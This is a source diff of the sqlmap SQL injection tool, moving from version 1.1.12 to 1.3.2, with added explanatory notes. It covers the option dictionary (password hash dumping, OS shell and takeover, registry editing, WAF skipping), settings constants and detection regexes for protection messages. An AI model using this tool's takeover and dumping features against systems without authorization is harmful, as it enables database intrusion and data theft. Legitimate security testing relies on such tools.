"Detection": {
"level": "integer",
"risk": "integer",
"string": "string",
"notString": "string",
"regexp": "string",
"code": "integer",
"textOnly": "boolean",
"titles": "boolean",
},

"Techniques": {
"tech": "string",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",
"uFrom": "string",
"dnsDomain": "string",
-"secondOrder": "string",
+"secondUrl": "string",
+"secondReq": "string",
},

"Fingerprint": {
"extensiveFp": "boolean",
},

"Enumeration": {
"getAll": "boolean",
"getBanner": ("boolean", "Banners"),
"getCurrentUser": ("boolean", "Users"),
"getCurrentDb": ("boolean", "Databases"),
"getHostname": "boolean",
"isDba": "boolean",
"getUsers": ("boolean", "Users"),
"getPasswordHashes": ("boolean", "Passwords"),
"getPrivileges": ("boolean", "Privileges"),
"getRoles": ("boolean", "Roles"),
"getDbs": ("boolean", "Databases"),
"getTables": ("boolean", "Tables"),
"getColumns": ("boolean", "Columns"),
"getSchema": "boolean",
"getCount": "boolean",
"dumpTable": "boolean",
"dumpAll": "boolean",
"search": "boolean",
"getComments": "boolean",
"db": "string",
"tbl": "string",
"col": "string",
-"excludeCol": "string",
+"exclude": "string",
"pivotColumn": "string",
"dumpWhere": "string",
"user": "string",
"excludeSysDbs": "boolean",
"limitStart": "integer",
"limitStop": "integer",
"firstChar": "integer",
"lastChar": "integer",
"query": "string",
"sqlShell": "boolean",
"sqlFile": "string",
},

"Brute": {
"commonTables": "boolean",
"commonColumns": "boolean",
},

"User-defined function": {
"udfInject": "boolean",
"shLib": "string",
},

"File system": {
-"rFile": "string",
-"wFile": "string",
-"dFile": "string",
+"fileRead": "string",
+"fileWrite": "string",
+"fileDest": "string",
},

"Takeover": {
"osCmd": "string",
"osShell": "boolean",
"osPwn": "boolean",
"osSmb": "boolean",
"osBof": "boolean",
"privEsc": "boolean",
"msfPath": "string",
"tmpPath": "string",
},

"Windows": {
"regRead": "boolean",
"regAdd": "boolean",
"regDel": "boolean",
"regKey": "string",
"regVal": "string",
"regData": "string",
"regType": "string",
},

"General": {
-#"xmlFile": "string",
+# "xmlFile": "string",
"trafficFile": "string",
"batch": "boolean",
"binaryFields": "string",
"charset": "string",
"checkInternet": "boolean",
"crawlDepth": "integer",
"crawlExclude": "string",
"csvDel": "string",
"dumpFormat": "string",
"encoding": "string",
"eta": "boolean",
"flushSession": "boolean",
"forms": "boolean",
"freshQueries": "boolean",
"harFile": "string",
"hexConvert": "boolean",
"outputDir": "string",
"parseErrors": "boolean",
"saveConfig": "string",
"scope": "string",
"testFilter": "string",
"testSkip": "string",
"updateAll": "boolean",
},

"Miscellaneous": {
"alert": "string",
"answers": "string",
"beep": "boolean",
"cleanup": "boolean",
"dependencies": "boolean",
"disableColoring": "boolean",
"googlePage": "integer",
"identifyWaf": "boolean",
+"listTampers": "boolean",
"mobile": "boolean",
"offline": "boolean",
-"purgeOutput": "boolean",
+"purge": "boolean",
"skipWaf": "boolean",
"smart": "boolean",
"tmpDir": "string",
"webRoot": "string",
"wizard": "boolean",
"verbose": "integer",
},

"Hidden": {
"dummy": "boolean",
"disablePrecon": "boolean",
"profile": "boolean",
"forceDns": "boolean",
"murphyRate": "integer",
"smokeTest": "boolean",
"liveTest": "boolean",
"stopFail": "boolean",
"runCase": "string",
},

"API": {
"api": "boolean",
"taskid": "string",
"database": "string",
}
}
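Note: optDict declares the expected datatype of every command line option (plain string, or a tuple carrying the "common outputs" category as well). A hedged sketch of how such a table can drive type coercion of raw values; the coerce_option helper and the trimmed stand-in dictionary are illustrative, not part of sqlmap:

optDict = {
    "Request": {
        "delay": "float",
        "retries": "integer",
        "randomAgent": "boolean",
        "agent": "string",
    },
}

_CASTS = {"integer": int, "float": float, "string": str,
          "boolean": lambda v: str(v).lower() in ("1", "true", "yes")}

def coerce_option(family, name, raw):
    datatype = optDict[family][name]
    # tuple entries carry ("datatype", "common outputs category"); keep only the type
    if isinstance(datatype, tuple):
        datatype = datatype[0]
    return _CASTS[datatype](raw)

assert coerce_option("Request", "retries", "3") == 3
assert coerce_option("Request", "randomAgent", "true") is True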
lib/core/patch.py (new file, 26 lines)
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import codecs
+import httplib
+
+from lib.core.settings import IS_WIN
+
+def dirtyPatches():
+"""
+Place for "dirty" Python related patches
+"""
+
+# accept overly long result lines (e.g. SQLi results in HTTP header responses)
+httplib._MAXLINE = 1 * 1024 * 1024
+
+# add support for inet_pton() on Windows OS
+if IS_WIN:
+from thirdparty.wininetpton import win_inet_pton
+
+# Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440
+codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None)
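Note: the last patch registers "cp65001" (the Windows code page number for UTF-8) as an alias of the built-in utf-8 codec. A quick stand-alone demonstration of the same trick:

import codecs

# make "cp65001" resolve to the built-in utf-8 codec where the interpreter
# does not already provide it (e.g. older Pythons driving a Windows console)
codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None)

print(u"sqlmap".encode("cp65001"))  # encoding by that name now always works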
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

@@ -9,7 +9,7 @@ import codecs
import os
import cProfile

-from lib.core.common import getUnicode
+from lib.core.common import getSafeExString
from lib.core.data import logger
from lib.core.data import paths
from lib.core.settings import UNICODE_ENCODING
@@ -20,13 +20,13 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
"""

try:
+__import__("gobject")
from thirdparty.gprof2dot import gprof2dot
from thirdparty.xdot import xdot
-import gobject
import gtk
import pydot
-except ImportError, e:
-errMsg = "profiling requires third-party libraries ('%s') " % getUnicode(e, UNICODE_ENCODING)
+except ImportError as ex:
+errMsg = "profiling requires third-party libraries ('%s') " % getSafeExString(ex)
errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')"
logger.error(errMsg)

@@ -50,7 +50,7 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
if os.path.exists(imageOutputFile):
os.remove(imageOutputFile)

-infoMsg = "profiling the execution into file %s" % profileOutputFile
+infoMsg = "profiling the execution into file '%s'" % profileOutputFile
logger.info(infoMsg)

# Start sqlmap main function and generate a raw profile file
@@ -80,15 +80,20 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
if isinstance(pydotGraph, list):
pydotGraph = pydotGraph[0]

-pydotGraph.write_png(imageOutputFile)
+try:
+pydotGraph.write_png(imageOutputFile)
+except OSError:
+errMsg = "profiling requires graphviz installed "
+errMsg += "(Hint: 'sudo apt-get install graphviz')"
+logger.error(errMsg)
+else:
+infoMsg = "displaying interactive graph with xdot library"
+logger.info(infoMsg)

-infoMsg = "displaying interactive graph with xdot library"
-logger.info(infoMsg)
-
# Display interactive Graphviz dot file by using extra/xdot/xdot.py
# http://code.google.com/p/jrfonseca/wiki/XDot
win = xdot.DotWindow()
win.connect('destroy', gtk.main_quit)
win.set_filter("dot")
win.open_file(dotOutputFile)
gtk.main()
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

@@ -14,11 +14,11 @@ _readline = None
try:
from readline import *
import readline as _readline
-except ImportError:
+except:
try:
from pyreadline import *
import pyreadline as _readline
-except ImportError:
+except:
pass

if IS_WIN and _readline:
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -27,7 +27,7 @@ class Replication(object):
             self.connection = sqlite3.connect(dbpath)
             self.connection.isolation_level = None
             self.cursor = self.connection.cursor()
-        except sqlite3.OperationalError, ex:
+        except sqlite3.OperationalError as ex:
             errMsg = "error occurred while opening a replication "
             errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex))
             raise SqlmapConnectionException(errMsg)
@@ -63,7 +63,7 @@ class Replication(object):
                 self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
             else:
                 self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
-        except Exception, ex:
+        except Exception as ex:
             errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
             errMsg += "located at '%s'" % self.parent.dbpath
             raise SqlmapGenericException(errMsg)
@@ -82,7 +82,7 @@ class Replication(object):
     def execute(self, sql, parameters=[]):
         try:
             self.parent.cursor.execute(sql, parameters)
-        except sqlite3.OperationalError, ex:
+        except sqlite3.OperationalError as ex:
             errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
             errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
             errMsg += "it's not used by some other program"
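The hunks above only modernize the exception syntax around sqlite3 usage. A hedged, self-contained sketch of the same pattern (open a SQLite file, create a table with quoted identifiers, surface sqlite3.OperationalError with a readable message); the helper and file names below are illustrative, not sqlmap's Replication API:

    import sqlite3

    def create_table(dbpath, name, columns):
        try:
            connection = sqlite3.connect(dbpath)
            connection.isolation_level = None
            cursor = connection.cursor()
            # quote identifiers the same way as the CREATE TABLE statements above
            cursor.execute('CREATE TABLE "%s" (%s)' % (name, ','.join('"%s" %s' % (col, type_) for col, type_ in columns)))
        except sqlite3.OperationalError as ex:
            raise RuntimeError("error occurred while opening a replication file '%s' ('%s')" % (dbpath, ex))

    create_table("dump.sqlite3", "users", (("id", "INTEGER"), ("name", "TEXT")))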
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -19,16 +19,18 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS

 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.1.12.0"
+VERSION = "1.3.2.0"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
 DESCRIPTION = "automatic SQL injection and database takeover tool"
 SITE = "http://sqlmap.org"
+DEFAULT_USER_AGENT = "%s (%s)" % (VERSION_STRING, SITE)
 DEV_EMAIL_ADDRESS = "dev@sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
-GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
+GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git"
 GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
+ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master"

 # colorful banner
 BANNER = """\033[01;33m\
@@ -37,17 +39,17 @@ BANNER = """\033[01;33m\
 ___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
 |_ -| . [.] | .'| . |
 |___|_ [.]_|_|_|__,| _|
-|_|V |_| \033[0m\033[4;37m%s\033[0m\n
+|_|V... |_| \033[0m\033[4;37m%s\033[0m\n
 """ % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)

 # Minimum distance of ratio from kb.matchRatio to result in True
 DIFF_TOLERANCE = 0.05
 CONSTANT_RATIO = 0.9

-# Ratio used in heuristic check for WAF/IPS/IDS protected targets
+# Ratio used in heuristic check for WAF/IPS protected targets
 IDS_WAF_CHECK_RATIO = 0.5

 # Timeout used in heuristic check for WAF/IPS/IDS protected targets
 IDS_WAF_CHECK_TIMEOUT = 10

 # Lower and upper values for match ratio in case of stable page
@@ -70,6 +72,7 @@ RANDOM_INTEGER_MARKER = "[RANDINT]"
 RANDOM_STRING_MARKER = "[RANDSTR]"
 SLEEP_TIME_MARKER = "[SLEEPTIME]"
 INFERENCE_MARKER = "[INFERENCE]"
+SINGLE_QUOTE_MARKER = "[SINGLE_QUOTE]"

 PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
 CHAR_INFERENCE_MARK = "%c"
@@ -82,10 +85,13 @@ SELECT_FROM_TABLE_REGEX = r"\bSELECT\b.+?\bFROM\s+(?P<result>([\w.]|`[^`<>]+`)+)
 TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"

 # Regular expression used for recognition of generic permission messages
-PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
+PERMISSION_DENIED_REGEX = r"(?P<result>(command|permission|access)\s*(was|is)?\s*denied)"
+
+# Regular expression used in recognition of generic protection mechanisms
+GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b"

 # Regular expression used for recognition of generic maximum connection messages
-MAX_CONNECTIONS_REGEX = r"max.+connections"
+MAX_CONNECTIONS_REGEX = r"\bmax.+?\bconnection"

 # Maximum consecutive connection errors before asking the user if he wants to continue
 MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
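The hunk above tightens several detection expressions: the permission message pattern now captures a named result group, a generic protection pattern is introduced, and the max-connections pattern is anchored on word boundaries. A quick sanity check of the new expressions (the sample response strings below are invented for illustration):

    import re

    PERMISSION_DENIED_REGEX = r"(?P<result>(command|permission|access)\s*(was|is)?\s*denied)"
    GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b"
    MAX_CONNECTIONS_REGEX = r"\bmax.+?\bconnection"

    page = "SELECT command denied to user 'foo'@'%' for table 'users'"
    match = re.search(PERMISSION_DENIED_REGEX, page)
    if match:
        print(match.group("result"))                                   # "command denied"

    print(bool(re.search(GENERIC_PROTECTION_REGEX, "Request blocked by firewall")))                                    # True
    print(bool(re.search(MAX_CONNECTIONS_REGEX, "User sa already has more than 'max_user_connections' active connections")))  # True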
@@ -93,6 +99,9 @@ MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
 # Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
 PRECONNECT_CANDIDATE_TIMEOUT = 10

+# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support)
+PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP",)
+
 # Maximum sleep time in "Murphy" (testing) mode
 MAX_MURPHY_SLEEP_TIME = 3

@@ -100,7 +109,7 @@ MAX_MURPHY_SLEEP_TIME = 3
 GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"

 # Regular expression used for extracting results from DuckDuckGo search
-DUCKDUCKGO_REGEX = r'"u":"([^"]+)'
+DUCKDUCKGO_REGEX = r'<a class="result__url" href="(htt[^"]+)'

 # Regular expression used for extracting results from Bing search
 BING_REGEX = r'<h2><a href="([^"]+)" h='
@@ -157,6 +166,9 @@ MAX_TECHNIQUES_PER_VALUE = 2
 # In case of missing piece of partial union dump, buffered array must be flushed after certain size
 MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024

+# Maximum size of cache used in @cachedmethod decorator
+MAX_CACHE_ITEMS = 256
+
 # Suffix used for naming meta databases in DBMS(es) without explicit database name
 METADB_SUFFIX = "_masterdb"

@@ -166,6 +178,9 @@ PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3
 # Minimum time response set needed for time-comparison based on standard deviation
 MIN_TIME_RESPONSES = 30

+# Maximum time response set used during time-comparison based on standard deviation
+MAX_TIME_RESPONSES = 200
+
 # Minimum comparison ratio set needed for searching valid union column number based on standard deviation
 MIN_UNION_RESPONSES = 5

@@ -202,6 +217,11 @@ DUMMY_USER_PREFIX = "__dummy__"
 # Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
 DEFAULT_PAGE_ENCODING = "iso-8859-1"

+try:
+    unicode(DEFAULT_PAGE_ENCODING, DEFAULT_PAGE_ENCODING)
+except LookupError:
+    DEFAULT_PAGE_ENCODING = "utf8"
+
 # URL used in dummy runs
 DUMMY_URL = "http://foo/bar?id=1"

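The block added at the end of the hunk above probes whether the iso-8859-1 codec is actually usable on the running interpreter and silently falls back to utf8 if not. A version-neutral sketch of the same idea (sqlmap's own check uses the Python 2 unicode() built-in, exactly as shown in the hunk; codecs.lookup below is an equivalent stand-in):

    import codecs

    DEFAULT_PAGE_ENCODING = "iso-8859-1"

    try:
        codecs.lookup(DEFAULT_PAGE_ENCODING)
    except LookupError:
        DEFAULT_PAGE_ENCODING = "utf8"

    print(DEFAULT_PAGE_ENCODING)   # "iso-8859-1" on any standard build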
@@ -214,9 +234,9 @@ PYVERSION = sys.version.split()[0]

 # DBMS system databases
 MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
-MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema")
+MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema", "sys")
 PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
-ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/
+ORACLE_SYSTEM_DBS = ('ANONYMOUS', 'APEX_030200', 'APEX_PUBLIC_USER', 'APPQOSSYS', 'BI', 'CTXSYS', 'DBSNMP', 'DIP', 'EXFSYS', 'FLOWS_%', 'FLOWS_FILES', 'HR', 'IX', 'LBACSYS', 'MDDATA', 'MDSYS', 'MGMT_VIEW', 'OC', 'OE', 'OLAPSYS', 'ORACLE_OCM', 'ORDDATA', 'ORDPLUGINS', 'ORDSYS', 'OUTLN', 'OWBSYS', 'PM', 'SCOTT', 'SH', 'SI_INFORMTN_SCHEMA', 'SPATIAL_CSW_ADMIN_USR', 'SPATIAL_WFS_ADMIN_USR', 'SYS', 'SYSMAN', 'SYSTEM', 'WKPROXY', 'WKSYS', 'WK_TEST', 'WMSYS', 'XDB', 'XS$NULL')
 SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
 ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
 FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
@@ -224,6 +244,7 @@ MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
 SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
 DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
 HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
+H2_SYSTEM_DBS = ("INFORMATION_SCHEMA")
 INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin")

 MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
@@ -237,20 +258,21 @@ MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
 SYBASE_ALIASES = ("sybase", "sybase sql server")
 DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
 HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
+H2_ALIASES = ("h2",)
 INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix")

 DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))

-SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES
+SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES
 SUPPORTED_OS = ("linux", "windows")

-DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES))

 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")
 HOST_ALIASES = ("host",)

-HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
+H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC"

 # Names that can't be used to name files on Windows OS
 WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
@@ -291,6 +313,10 @@ BASIC_HELP_ITEMS = (
     "wizard",
 )

+# Tags used for value replacements inside shell scripts
+SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%"
+SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%"
+
 # String representation for NULL value
 NULL = "NULL"

@@ -300,13 +326,17 @@ BLANK = "<blank>"
 # String representation for current database
 CURRENT_DB = "CD"

+# Name of SQLite file used for storing session data
+SESSION_SQLITE_FILE = "session.sqlite"
+
 # Regular expressions used for finding file paths in error messages
-FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.~-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
+FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"in (?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.~-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")

 # Regular expressions used for parsing error messages (--parse-errors)
 ERROR_PARSING_REGEXES = (
-    r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
-    r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
+    r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P<result>[^<]+)",
+    r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>[^<]+)",
+    r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
     r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
     r"<li>Error Type:<br>(?P<result>.+?)</li>",
     r"CDbCommand (?P<result>[^<>\n]*SQL[^<>\n]+)",
@@ -333,7 +363,7 @@ COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "
 WEBSCARAB_SPLITTER = "### Conversation"

 # Splitter used between requests in BURP log files
-BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
+BURP_REQUEST_REGEX = r"={10,}\s+([A-Z]{3,} .+?)\s+={10,}"

 # Regex used for parsing XML Burp saved history items
 BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
@@ -348,10 +378,10 @@ URI_HTTP_HEADER = "URI"
 URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"

 # Regex used for masking sensitive data
-SENSITIVE_DATA_REGEX = "(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
+SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"

 # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
-SENSITIVE_OPTIONS = ("hostname", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred")
+SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred")

 # Maximum number of threads (avoiding connection issues and/or DoS)
 MAX_NUMBER_OF_THREADS = 10
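SENSITIVE_DATA_REGEX above is a template: the known sensitive value is substituted into the %s slot and the resulting pattern is used to blank that value out of reported command lines. A hedged sketch of that usage (the helper below is illustrative, not sqlmap's own maskSensitiveData()):

    import re

    SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"

    def mask(commandline, value):
        # substitute the escaped value into the template, then blank the whole token
        regex = SENSITIVE_DATA_REGEX % re.escape(value)
        return re.sub(regex, lambda m: m.group(0).replace(m.group("result"), '*' * 8), commandline)

    print(mask("sqlmap.py -u http://target/vuln.php?id=1 --auth-cred=admin:s3cret --batch", "s3cret"))
    # -> sqlmap.py -u http://target/vuln.php?id=1 --auth-cred=******** --batch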
@@ -372,7 +402,7 @@ CANDIDATE_SENTENCE_MIN_LENGTH = 10
 CUSTOM_INJECTION_MARK_CHAR = '*'

 # Other way to declare injection position
-INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%'
+INJECT_HERE_REGEX = r"(?i)%INJECT[_ ]?HERE%"

 # Minimum chunk length used for retrieving data over error based payloads
 MIN_ERROR_CHUNK_LENGTH = 8
